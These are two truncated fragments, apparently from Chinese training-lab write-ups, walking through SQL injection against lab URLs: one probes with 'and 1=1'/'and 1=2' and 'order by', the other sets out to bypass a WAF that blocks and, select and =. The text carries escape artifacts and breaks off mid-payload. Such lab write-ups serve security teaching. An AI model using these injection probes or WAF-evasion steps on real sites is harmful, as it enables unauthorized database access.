第二章:遇到阻难!绕过WAF过滤
目标地址:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171#CTL{\n}#CTL{\n}## 判断是否存在注入点#CTL{\n}#CTL{\n}用 and 方式判断是否存在注入点,发现会拦截很多字符。测试发现包括但不限于 and,select,=。#CTL{\n}#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/4565/
第一章:为了女神小芳!
目标地址:http://pu2lh35s.ia.aqlab.cn/?id=1#CTL{\n}#CTL{\n}### 判断是否存在注入#CTL{\n}#CTL{\n}?id=1 and 1=1 页面显示正常#CTL{\n}?id=1 and 1=2 页面不显示内容,说明存在注入点#CTL{\n}#CTL{\n}### 判断表字段个数#CTL{\n}#CTL{\n}?id=1 order by 2
1